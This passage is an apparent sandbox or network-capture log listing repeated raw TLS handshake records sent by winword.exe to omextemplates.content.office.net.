  216. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x9b\\xa9s\\x86\\xb7#\\xaa\\xbe/\\x11r\\x9b\\xf3%=mp\\xa9\\x11\\xde\\xd2j\\xb1\\xea\\xdd\\x16\\xb6m\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  217.  
  218.  
  219. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92x\\x9c\\xf8\\xb94\\xb7zo\\x07\\x1e \\xfap;\\x9b\\xb2\\xdc;\\xf8\\xb2\\xb4\\xcc\\x8d\n\\xf8\\xf1\\x84+\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  220.  
  221.  
  222. "http_request": "winword.exe_WSASend_f\\x00\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92n\\xf0\\xcb_\\xdb\\xe6\\xda\\x80\\xe6j\\x1f\\xf3\\xa5&7\\x19\\xf3h\\x9c\\xdf@d\\x05\\xb2d\\xc4\\xe3i\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  223.  
  224.  
  225. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xcc\\xce\\x9e\\xf7\\xc2g\\xa7\\xd7p58\\xb3\\x0e\\x03\\x11n\\xeb\\xcc^v\\xbf\\x966a\\xf3\\xed\\x04\\x04\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  226.  
  227.  
  228. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xf1\\g\\xc9\\\\xa7*\\xda\\x8b\\xff\\xfc\\xeb+`\\xad\\xe2\\xa0%i\\xda\\xd1d\\xcc\\x1am\\xa1n\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  229.  
  230.  
  231. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92s\\x80,\\xf8\\xfc)\\x0f\\x02\\xae\\x8c\\xf2\\xe3\\x87\\x8e\\xb8\\xb84\\x87\\x1b\\xa4\\xabc|\\xfa\\x9c\\x06\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  232.  
  233.  
  234. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92.\\xfei\\x10\\xb9t\\xd3r\\x8e\\xce\\x16\\xa3\\xcbv\\xdef$c\\xd6\\xc6\\xa7\\xfa\\x08qt\\x08\\\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  235.  
  236.  
  237. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xa2\\xcd;\\x91\\xf3\\xfc\\\\xea\\xb5\\xb2\\xa0so\\xe5\\xb0\\xf12\\x971\\xebwo\\xb7\\x9e\\xc7\\xb7z\\xcd\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  238.  
  239.  
  240. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\x94\"\\xad\\x9194\nf\\xb4\\xb6i\\x1d<t\\xcdg\\x1e\\x945o\\xd1\\x0fl-x\\xf0\\x1f&\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  241.  
  242.  
  243. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xce\\x00\\x9d\\x02\\xf4#;\\x80\\xdd\\xb59m\\xe3y8\\xd5d\\xf5fo7\\xe3h\\xa5\\xb21\\x9c\\xd3\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  244.  
  245.  
  246. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92kz\\x16\\x1by\\x8b\\xca\\x83\\xdc\\xdc\\x9e\\x06\\xfe\\xf7\\xe6\\xfbj\\xbc4\\x1f\\xad\\xc8\\x11\\x8bh-\\xad\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  247.  
  248.  
  249. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x925\\x83\\x92\t\\xeebsbo1\\x89c8@\\xae\\xbb\\xb7d\\xc3\\x02\\xe5\\xf8\\xa5\\x05\\xd8l\\xdb\\x91\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  250.  
  251.  
  252. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xc1\\xd6\\xde\ry\\xb1p>\\x8d\\x8c\\x10\\xad2&c\\xd1\\xb0\\xb6\\x1d\\x02(k\\x03it\\xefp\\x87\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  253.  
  254.  
  255. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xcc*\\xe4k\\xc6\\xc8\\x99\\xe7\\xc8-\\x0c\\xb5\\xbac\\xfa\\xa0\\x9a\\xe9\\x92\\xa0qnue\\x10\\x01\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  256.  
  257.  
  258. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92k\\xb9_\\xec\\xc3\\xc1w\\x05\\xc9\\xe6\\x14#\\xd80\\x89aa\\x8e\\xef\\x8e\\x91\\xde'91\\x9b\\xdez\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  259.  
  260.  
  261. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x19\\x14\\xe4\\xa9\\x81\\x87\\x8a\\x80.\\xd9\\xbbh\\xcd\\xb2;@\r\\xc1\\x82o z\\x14\\x10_b\\xae\\xa6\\\\xad\\x1f\\xccc\\x10#5\\xde\\xce\\xdd\\xedm\\x1f\\x16d\\xf1\\xe4\\xa9\\xf5w\\xf5\\xb6\\xc7n\\x05\\xcbqd0\\x03\\x00\\xd6\\x90\\x04\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000rn\\x19\\x9fn\\x0c\\xbd\\x9a\\xed.\\x8ay)8\\xaa\\xc7\\xd5\\xf8\\x91u\\xda\\x00ar\\xb1,=\\xd5,s\\x0ec\\x83zn\\x87\\x9e\\x01t\\xf8\\x1e\\xfae~x\\x16"
  262.  
  263.  
  264. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9f\\xd1\\xbfy\\xe7\\xa1@\\xe8\\x91bnd\\xd6\\xc8wu\\x12\\xf8\\xee\\x12\\xb0\\xed k\\xc0\\xaf\\x8d\\xc1\\xa3\\xcf\\xaf\\xe0a\\x87\\xe3omb\\x8ck\\xa4\\xd0\\xb3\\x90\\xdcd\\xac\\xce\\xfd\\x11\\x1c\\x9d\\x02:\\x9dnfx\\xe5\\xe1\\xc7p\\xa9\\xcc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc47\\x13\\x06o\\xe6\\xa3\\x1f,h\\x9f\\xc1\\xc0\\x0b\\xa3\\x89\\xb3\\xd2\\x03|\\xf1\\xe6\\x9ey\\x19\\xa8\\xb5k\\xa3\\xd0^\\xe0\\xda\\xdan\\xc1+\\x13\\xb3\\xac\\xc1\\xbaa\\xa6\\xad\\x85\\x95|"
  265.  
  266.  
  267. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9b!\\xd0\\x8c\\x7f \\x8aqi\\xad\\xc1\\xa8\\x15\\xdd\\x8b\\xd38\\xf5\\x1c\\x1a\\xfa\\xdc^f'\\xefd;+\\xf9,\\xf4%\\x97\\xf0\\x9d\\x17\\xe1\\xf3\\xf3\\xdd\\x141\\x154\\xd9\\x02'\\x1d\\xe3`\\xbfc\\xe8\\x14/\\x12e\\xcb\\xf3\\xd5\\xce\\xc9\\xe4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x8d\\xdd\\x89\\xa1\\x81.\\x7f\\x93\\x8266p=\\xe5\\xc9\\xce\\xd9\\xa6i\\xcc2\\x1a\\xd6\\xb1^j\\xed\\x8f\\xa7\\xe43\\xfe\n\\x83\\x81jv\\xff\\xe1\\x98$\\xb8nt%f"
  268.  
  269.  
  270. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xca\\xfdgd\\x8d\\xb5\\xc6)\\xaa\\xe9\\x8e\\xec\\x1c^#<\\xbb\\xe9\\xc7\\xc6\\x7fw\\x0c\\x1d+\\x93l\\xab\\xc0hf\\xd8\\xb5dr\\x98\\xd1\\x06w\\xbe\\xa8\\x12\\xbe\\xb7\\xb0\\x97u\\xc9\\xa8\\x9a\\x9c\\xcboq*@kna\\xd1jf`\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\xb9e\\x9f\\xc9\\xa3-\\xd3\"\\x01\\xf7\\x14\\x0ey\\xe6\\x19!\\x05\\x0e><\\xad\\x80=9y\\xca\\xec\\x85\\xd6\\xcby\\x9f\\xb6`\\xeeq\\x0c\\x8d\\x9a\\xdd\\xa8ge#d\\xb0\\x15"
  271.  
  272.  
  273. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x92\\xc3:\\xccr=r\\xde*\\x91\\x86i\\xa8\\xd9\\xaf\\xc4\\x0e\\x08\\xc7e)\\xf0j\\xc5\\x08tw5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  274.  
  275.  
  276. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x18\\xb6?\\x113\\xbd\\x8d\\x89\\xa2x\\x0b\\xdc\\x10\\xeesy\\xfdx\\xde\\x18)f\\x7f\\x7fz\\xfb\\xb8\\xf5\\xdb\\x86\\x1c@\\xd4ng\\x94\\x1c\\x18u@8\\xfb.l\\xf4ih\\xaf\\xc9\\xda\\x92\\xaflj\\xee\\x85\\xe0\\xf7\\xae\\x0e\\xbc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0002\\x13\\x86\\x04^\\x03\\xf8m\\xabfh\\x88\\xfbm\\xf4hjn\\x8e\\xda~\\xb4i;\\xd3\\xef\\x8e\\x93x\r\\xcf\\x14\\xef\\xd5\\x80\\x8c\\xde\\x96\\x15\\xea\\xfcih\\xeeu"
  277.  
  278.  
  279. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x91\\xaa\\xa1\\xe0&\\xec\\xca/\\xc0\\x84\\xb3i\\xab\\xc9~\\xab\\xb7\\x1b\\xbc9\\xc6\\xbd\\xe0h\\xfe\\xf5/o\\xb6\\xc2i\\xb1l\\x9a\\xa1\\xcau|.e\\x93h\tb%\\x85\\xc4\\x94\\x8f\\xdf\\xca\\xc2\\x82\\xdb\\xc6\\xc7\\xdb\\x11\\x15\\xa8p\\xff\\x8c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xee\\xfd5\\xae\\xec\\xfc\\xfd\\xa1\\x9b.\\x03\\x8e\\x9d\\xbbls\\xc5\\xa7h\\xcb\\xffm\\xee\\xc2\t\\xe1\\xe9\"\\x85u\\xdd\\x92\\xe0\t\\xe7\\xfao\\xca\\x9d\\xb2\\x95\\x13l^\\x0e\\xdf\\x0b,"
  280.  
  281.  
  282. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04rk\\xa2\\xeao\\x0b\\xaf\\xa9#e\\x97\\x9dwo\\xa0\\xcdj\\x89!\\x9d\\xc1g\\x04\\x98\\xdbj:k\\xf7\\xa9\\xe6\\xc4\\xb4\\xe3\\xf7\\x7f,\\xf0\\xd2\\k\\x97\\xa0\\xf6\\x9c\\x04'\\xaee\\xe4<x\\x92d\\xd20\\xd9\\x83 w\\xf4\\xd6\\xcd\\x0c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x85\\xa6\\xd3\\xa0\\xf0\\x0f\\xb28\\xc9\\xd8=\\xb1w\\xc5\\xc9~\\x8e\\x90\\x88\\x98&\\x89\\xeb\\xf6jw\\xc0\\xae\\xd9\\x04\\x0e\\x93\\x12\\xd9e\\xb9\\x90vx\\xc12\\xe7\\x06t\\x96r\\xefn"
  283.  
  284.  
  285. "http_request": "winword.exe_WSASend_\\x06\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04>\\xcb\\x1c\\x9b\\x06\\x02\\xcd\\xc4\\x98\\x854\\x0cz\\x96|\\xa5\\xbe\\x88\\x0f\\xf7\\xa0\\x92\\xd4\\xef\\\\xbc\\x86g\\x9cl\\x8f%\\x9c\\x08\\xa0%\t^t?\\x90_\\xd6\\xf2\\x1c\\x92oq*$\\xb9c\\xad\\xd8\\xa7\\x9a\\xa51\\xee\\xf6\\x1aw\\xa4\t\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbb\\x9el\\xa8r\\xab\\xedlh6\\x0f\\xa6jf\\x9d\\x17\\x96\\x8b7$\\xcd\\xcc\\xd5\\x96\\x06\\x05\\xf3\\x12v\\xeb\\x89\\xb6\\xc0s\\x98\\xc7c\\x0f\\x06\\x03\\x05\\xfe\\xdfe`\\x9dz\\xf3"
  286.  
  287.  
  288. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xde\\xac\\x81\\xdf5i\\xc4\\xcc`>\\xdd:\\xcf\\xf7\\x0et\\x97y'\\xa2\\xb74\\x05p3\\xeb\\xb0c\\xa5a\\xae\\xfe\\xfa\\xa4\\x8f\\xf27_\\xaa\\x1e\\x93qu\\xe6\\xf2\\x1fp\\xb4l\\xcb\\x9f\\xae\\xc2s_\\xf0\\x85p\\xf9\\xf7\\xf6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000%\\xb6\\xe5\\x86\\x99\\xc40f\\x05\\xb8\\xdf\\xbb\\xbe\\xd0\\xd6\\x90a\\xce\\x06+\\x10\\x88\\x1b\\xbfw>ts\\x04\\xf3\\xf4$\\xf5\\xc9>nm\\x00\\xc3j.\\xc5c\\x18\\xde\\x83\t"
  289.  
  290.  
  291. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04i\\x970\\xc8\\x8a#\\x87uf\\x81\\xe29\\xf3\\xf3u~\\x1a\\x17\\x94*\\xcc\\xc9\\xa6\\x0ee\\xc0\\x92\\x8e\\xca\\xa5\\xa3 \\xffa\\xfb\\xf7\\x8c\\xc1\\x92\\xdc\\xbcff3\\xb8\\xd5\\x10\\x8f>\\xda\\xb9?\\xf2%\\xd7)\\xa9\\xfb\\xfa\\xf2q\\x13/o\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x96:\\xa8@t\\x87ox\\xc5\\x97\\xf4\\x9by\\x0b\\x96\\xa1\\x86?\\x15\\x1c`\\x8a\\xefy\\xc1\\xd0>\\x9d\\xf9\\x0c\\xf2m\\x86o\\xa3\\xd7\\xa3\\xf2\\xa0\\x1ai\\xfb'\\xdb\\xc1\r\\xca\\x9a"
  292.  
  293.  
  294. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc1\\xda\\xf4e\\xccg\\xe6\\xbf\\xb3\\xd0\\xf9\\x1b\\x130\nvgb'\\x82\\x8c\\x19l\\x02\\x87\\xc6\\xfe\\xca\\xc1`\\x89\\xf5=o\\x93_q\t\\xc0\\xb7\\x87\\x93k\\xbdp)\\x85ez,#d+\\xafe\\xcb\\x02\\xf9\\xa9c\\x9c\\x80a\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc2\\xe8c|\\xa8\\x95i\\x02v\\xe9-\\xbca\\xfeu\\xfai\\xddr\\x1ci\\xbcjd\\x1b\\xe81\\xa4#\\xe4\\xa8\\xb6\"\\xb9\\x95k\\x8a\\xf6:b\\x90/\\xe5y\\xc6v\\xf5\\x85"
  295.  
  296.  
  297. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04u\\xdc\\x9a\\xf2\\xe6j\n\\xd5\\xa5\\xc0\\x1f\\x98\\xa7t9\\x1a\\xff7yj1:\\xbe_\\xea\\xe94\\xc5\\x15\\x0cb\\x93\\xf4\\xca\\x0e+\\xb5\\x0cf\\xb9\\x86\\x05y\\xc6\\x96\\xec\\xdb\\xe4z\\x19\\x81\\x1d\\x933.\\xa2`\\xe6\\xb9\"\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xbe\\x1da\\x19\\xf5\\x9fe\\x1c\\xdc\\xaaj\\x02\\xd2by\\x13\\xf6x\\xe8g\\xdf_\\xe2\\x00\\xcc4u\\xf2\\x04\\xf2/p\\xcb\\x00)&\\xc5\\xa5s\\xc8\\xb7\\x99f\\x8c\\x00g"
  298.  
  299.  
  300. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb3\\xd1\\xb1\\xd5|n7\\x86w\\xb8\\x07d\\xe6i!6s\\x8a\\xfb\\xa1&\\xc1\\x84%\\xbeu\\xbb\\xb4\\x13c\\xe58\\xeb9@\\x01\\xfe\\xdc\\xf2:j\\xf5\\xaa\\xf1\\xe4\\xf6\\k\\xe9r*\\xcbt\\xa7=\\xc1pus\\x95@h-\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb5w5r\\xbc\\xc4\\xdf\\xa1\\x1a\\xd5qg\\xa2\\x0e%6ixl\\xa2\\xac\\xd3\\x17\\xae|\\x1byazj\\xc1\\xde\\xb9\\xcf\\xb7 \\x05\\x1d\\x85ek\\xf7.\\x15q\\xeb0"
  301.  
  302.  
  303. "http_request": "winword.exe_WSASend_\\x1a\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4i\\x05\\x85\\x8c\\x18g\\xe9\\xe4\\xbbh\\xd5\\x97ur\\x9e\\xf9\\xa5\\x9as|\\x83\\xbd\\xcdg\\xd6\\xf7/bh\\xf9$l\\xeaq\\xb3\\x03\\x06\\xb9\\xe4h\\xc5\\x19\\xa6\\\\xc9\\x89r\\xfb\\x9d\\x85\\xf9r,v\\x90\\xe7:4\\x13\\xe9\\xcd\\xde\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf4\\xf5^\\xb3\\x086\\x10t\\x1e\\xa3\\x08u\\x90xu\\x82\\x14\\xa3\\xce\\xf0\\x95nu\\x00\\xe9\\xf9\\x8ccc2r\\x00\\x95\\x85\\x03k&\\x87\\x96s<\\xd8\\xa6\\xe5pc\\x15\\xa5"
  304.  
  305.  
  306. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc4x\\xa4 \\xe5c^\\x04\\x8c\\xdd>9\\xec\\x97\\x98\\xb5\\xe8\\x87v\\xaa\n\\xba\\xcb\\xf70i\\xf3\\xf0\\x07\\xde\\x92\\xec\\x12\\xd8t\\xb1x(h\\x89\\x9c\\xd5\\xc5\\x80\\xc6y\\x8c\\x9f\\x1c\\xb3\\x18\\x80\\xf07\\xfb\"\\xcf\\xf80\\x07\\xfe\\xa2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x0b0\\xdd*t\\x18\\x04.w\\xb4\\xa5\\x1e\\x11\\xfc\\x13\\xec\\xf0_\\x99)\\xc8\\xd6\\xf7\\x8de\\xf8\\xf3\\x10\\x97gz\\xd0\\xfd\\xa7z\\x10\\x9e\\xff\\xf0h\\xa1\\xd7\\x1c\\xf6*\\xdf$\\xde"
  307.  
  308.  
  309. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd4\\xfd\\x94\\x95\\xba|\\x9f_\\xaf\\xe3t\\xa4!;\\x03\\xec\\xa7\\x02\\xfe\\xc3o\t$%!\\x01/\\xd2vcd\\xb0\\xcam\\xa9g\\xbd\\x05\\xe2\\x98fe0\\x84\\x0f\\x0c\\xb2y\\xab\\xa9\\xb8s\\xcee\\x18\\xaffjy\\xfa\\x01\\xc4\\x0c\\xae\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000lc\\xd1\\xccd\\x07k\\x7fwt\\x99\\xfe\\xd0\\x94\\xdb\\xfb\\xd9\\xd3wc\\xef\\x16\\xef\\xed\\x15\\xc3\\x91\\xd8 3\\xea)\\xac\\xb7\\x1ep?\\x83\\xdfl\\xf4\\x1a\\x15?a4|"
  310.  
  311.  
  312. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xf8\\xaa,x\\x96\\xb1fo\\x8c\\x91\\x19\\xe7\\x05\\xb4%%\\x02b\\xa5e\\xfa\\xc7;b\\x10\\xc8#cwp\\xe5p@\\xbb\\xbarz\\xcd=\\xa6d\\xb3\\xbf-\\xe4\\xe9z\\x05yx\\x8d2un\\xf1_\\x8agj\\xa55\\x01\\xd3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0\\xbe\\x90\\xdfi\\x1d\\x86t\\x15j\\xd05\\x04\\xa4\\x0b\\x1d\\xe0a \\x81\\x008\\xc4\\xdff\\x82\\xad\\x89\r\\x05\\xe2\\xc8h\\xb3\\x7f\\xc7\t\\xa4\\x9d8!\\x19\\xe0'pmm("
  313.  
  314.  
  315. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x12\\xf4\\x9f\\xec\\x833\\x88ta\\xf2\\x94\\xf0_\\x11\\xdc\\xaa\\x9e\\xb5u\\xa9)\\x11!w\\x1c\\x9c\\x15\\x01wc+\\x8d\\xe3b\\xcd\\xaf\\x18p\\x892\\xe1z\\xc6\\xb0<\\xd6\\xaa\\xdb_jh\\x0b\\xea\\xb4\\xb4\\x81\\xa3\\x13m\\x85\\xc3\\xff\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd4\"n\\x82\\xda\\xa7\\xf6\\x84\\xc9\\xa5\\x7f\\xafp\\x81\\x0c\\xf7\\x83\\l+\\xfam\\x99h7\\xd6g\\xe6\\xc6\\xa9\\x18\\xd8\\xa7v\\xea\\xc1/)u#\\xf1\\xbf>\\x00\\xb3\\x9el\\xf7"
  316.  
  317.  
